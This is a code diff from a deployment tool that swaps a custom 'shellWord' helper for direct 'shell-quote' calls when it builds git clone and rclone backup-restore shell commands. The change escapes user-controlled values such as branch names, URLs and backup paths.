command += `mkdir -p ${outputPath};`;
|
command += `mkdir -p ${outputPath};`;
|
||||||
const repoClone = getGitlabRepoClone(gitlab, gitlabPathNamespace);
|
const repoClone = getGitlabRepoClone(gitlab, gitlabPathNamespace);
|
||||||
const cloneUrl = getGitlabCloneUrl(gitlab, repoClone);
|
const cloneUrl = getGitlabCloneUrl(gitlab, repoClone);
|
||||||
command += `echo ${shellWord(`Cloning Repo ${repoClone} to ${outputPath}: ✅`)};`;
|
command += `echo ${quote([`Cloning Repo ${repoClone} to ${outputPath}: ✅`])};`;
|
||||||
command += `git clone --branch ${shellWord(gitlabBranch)} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${shellWord(cloneUrl)} ${shellWord(outputPath)} --progress;`;
|
command += `git clone --branch ${quote([String(gitlabBranch ?? "")])} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${quote([String(cloneUrl ?? "")])} ${quote([String(outputPath ?? "")])} --progress;`;
|
||||||
return command;
|
return command;
|
||||||
};
|
};
|
||||||
|
|
||||||
|
|||||||
@@ -1,10 +0,0 @@
|
|||||||
import { quote } from "shell-quote";
|
|
||||||
|
|
||||||
/**
|
|
||||||
* Escapes a single value so it can be safely interpolated as one argument into
|
|
||||||
* a `/bin/sh -c` command string (both local `execAsync` and remote SSH
|
|
||||||
* `execAsyncRemote`). User-controlled fields such as git URLs, branch names,
|
|
||||||
* repository owners and SSH hostnames must never reach a shell unescaped.
|
|
||||||
*/
|
|
||||||
export const shellWord = (value: string | number | null | undefined): string =>
|
|
||||||
quote([String(value ?? "")]);
|
|
||||||
@@ -1,6 +1,7 @@
|
|||||||
import type { apiRestoreBackup } from "@dokploy/server/db/schema";
|
import type { apiRestoreBackup } from "@dokploy/server/db/schema";
|
||||||
import type { Compose } from "@dokploy/server/services/compose";
|
import type { Compose } from "@dokploy/server/services/compose";
|
||||||
import type { Destination } from "@dokploy/server/services/destination";
|
import type { Destination } from "@dokploy/server/services/destination";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import type { z } from "zod";
|
import type { z } from "zod";
|
||||||
import { getS3Credentials } from "../backups/utils";
|
import { getS3Credentials } from "../backups/utils";
|
||||||
import { execAsync, execAsyncRemote } from "../process/execAsync";
|
import { execAsync, execAsyncRemote } from "../process/execAsync";
|
||||||
@@ -26,10 +27,10 @@ export const restoreComposeBackup = async (
|
|||||||
const rcloneFlags = getS3Credentials(destination);
|
const rcloneFlags = getS3Credentials(destination);
|
||||||
const bucketPath = `:s3:${destination.bucket}`;
|
const bucketPath = `:s3:${destination.bucket}`;
|
||||||
const backupPath = `${bucketPath}/${backupInput.backupFile}`;
|
const backupPath = `${bucketPath}/${backupInput.backupFile}`;
|
||||||
let rcloneCommand = `rclone cat ${rcloneFlags.join(" ")} "${backupPath}" | gunzip`;
|
let rcloneCommand = `rclone cat ${rcloneFlags.join(" ")} ${quote([backupPath])} | gunzip`;
|
||||||
|
|
||||||
if (backupInput.metadata?.mongo) {
|
if (backupInput.metadata?.mongo) {
|
||||||
rcloneCommand = `rclone copy ${rcloneFlags.join(" ")} "${backupPath}"`;
|
rcloneCommand = `rclone copy ${rcloneFlags.join(" ")} ${quote([backupPath])}`;
|
||||||
}
|
}
|
||||||
|
|
||||||
let credentials: DatabaseCredentials = {};
|
let credentials: DatabaseCredentials = {};
|
||||||
|
|||||||
@@ -1,6 +1,7 @@
|
|||||||
import type { apiRestoreBackup } from "@dokploy/server/db/schema";
|
import type { apiRestoreBackup } from "@dokploy/server/db/schema";
|
||||||
import type { Destination } from "@dokploy/server/services/destination";
|
import type { Destination } from "@dokploy/server/services/destination";
|
||||||
import type { Libsql } from "@dokploy/server/services/libsql";
|
import type { Libsql } from "@dokploy/server/services/libsql";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import type { z } from "zod";
|
import type { z } from "zod";
|
||||||
import { getS3Credentials, getServiceContainerCommand } from "../backups/utils";
|
import { getS3Credentials, getServiceContainerCommand } from "../backups/utils";
|
||||||
import { execAsync, execAsyncRemote } from "../process/execAsync";
|
import { execAsync, execAsyncRemote } from "../process/execAsync";
|
||||||
@@ -19,7 +20,7 @@ export const restoreLibsqlBackup = async (
|
|||||||
|
|
||||||
const backupPath = `${bucketPath}/${backupInput.backupFile}`;
|
const backupPath = `${bucketPath}/${backupInput.backupFile}`;
|
||||||
|
|
||||||
const rcloneCommand = `rclone cat ${rcloneFlags.join(" ")} "${backupPath}"`;
|
const rcloneCommand = `rclone cat ${rcloneFlags.join(" ")} ${quote([backupPath])}`;
|
||||||
|
|
||||||
const containerSearch = getServiceContainerCommand(appName);
|
const containerSearch = getServiceContainerCommand(appName);
|
||||||
const restoreCommand = `docker exec -i $CONTAINER_ID sh -c "tar xzf - -C /var/lib/sqld"`;
|
const restoreCommand = `docker exec -i $CONTAINER_ID sh -c "tar xzf - -C /var/lib/sqld"`;
|
||||||
|
|||||||
@@ -1,6 +1,7 @@
|
|||||||
import type { apiRestoreBackup } from "@dokploy/server/db/schema";
|
import type { apiRestoreBackup } from "@dokploy/server/db/schema";
|
||||||
import type { Destination } from "@dokploy/server/services/destination";
|
import type { Destination } from "@dokploy/server/services/destination";
|
||||||
import type { Mariadb } from "@dokploy/server/services/mariadb";
|
import type { Mariadb } from "@dokploy/server/services/mariadb";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import type { z } from "zod";
|
import type { z } from "zod";
|
||||||
import { getS3Credentials } from "../backups/utils";
|
import { getS3Credentials } from "../backups/utils";
|
||||||
import { execAsync, execAsyncRemote } from "../process/execAsync";
|
import { execAsync, execAsyncRemote } from "../process/execAsync";
|
||||||
@@ -19,7 +20,7 @@ export const restoreMariadbBackup = async (
|
|||||||
const bucketPath = `:s3:${destination.bucket}`;
|
const bucketPath = `:s3:${destination.bucket}`;
|
||||||
const backupPath = `${bucketPath}/${backupInput.backupFile}`;
|
const backupPath = `${bucketPath}/${backupInput.backupFile}`;
|
||||||
|
|
||||||
const rcloneCommand = `rclone cat ${rcloneFlags.join(" ")} "${backupPath}" | gunzip`;
|
const rcloneCommand = `rclone cat ${rcloneFlags.join(" ")} ${quote([backupPath])} | gunzip`;
|
||||||
|
|
||||||
const command = getRestoreCommand({
|
const command = getRestoreCommand({
|
||||||
appName,
|
appName,
|
||||||
|
|||||||
@@ -1,6 +1,7 @@
|
|||||||
import type { apiRestoreBackup } from "@dokploy/server/db/schema";
|
import type { apiRestoreBackup } from "@dokploy/server/db/schema";
|
||||||
import type { Destination } from "@dokploy/server/services/destination";
|
import type { Destination } from "@dokploy/server/services/destination";
|
||||||
import type { Mongo } from "@dokploy/server/services/mongo";
|
import type { Mongo } from "@dokploy/server/services/mongo";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import type { z } from "zod";
|
import type { z } from "zod";
|
||||||
import { getS3Credentials } from "../backups/utils";
|
import { getS3Credentials } from "../backups/utils";
|
||||||
import { execAsync, execAsyncRemote } from "../process/execAsync";
|
import { execAsync, execAsyncRemote } from "../process/execAsync";
|
||||||
@@ -18,7 +19,7 @@ export const restoreMongoBackup = async (
|
|||||||
const rcloneFlags = getS3Credentials(destination);
|
const rcloneFlags = getS3Credentials(destination);
|
||||||
const bucketPath = `:s3:${destination.bucket}`;
|
const bucketPath = `:s3:${destination.bucket}`;
|
||||||
const backupPath = `${bucketPath}/${backupInput.backupFile}`;
|
const backupPath = `${bucketPath}/${backupInput.backupFile}`;
|
||||||
const rcloneCommand = `rclone copy ${rcloneFlags.join(" ")} "${backupPath}"`;
|
const rcloneCommand = `rclone copy ${rcloneFlags.join(" ")} ${quote([backupPath])}`;
|
||||||
|
|
||||||
const command = getRestoreCommand({
|
const command = getRestoreCommand({
|
||||||
appName,
|
appName,
|
||||||
|
|||||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user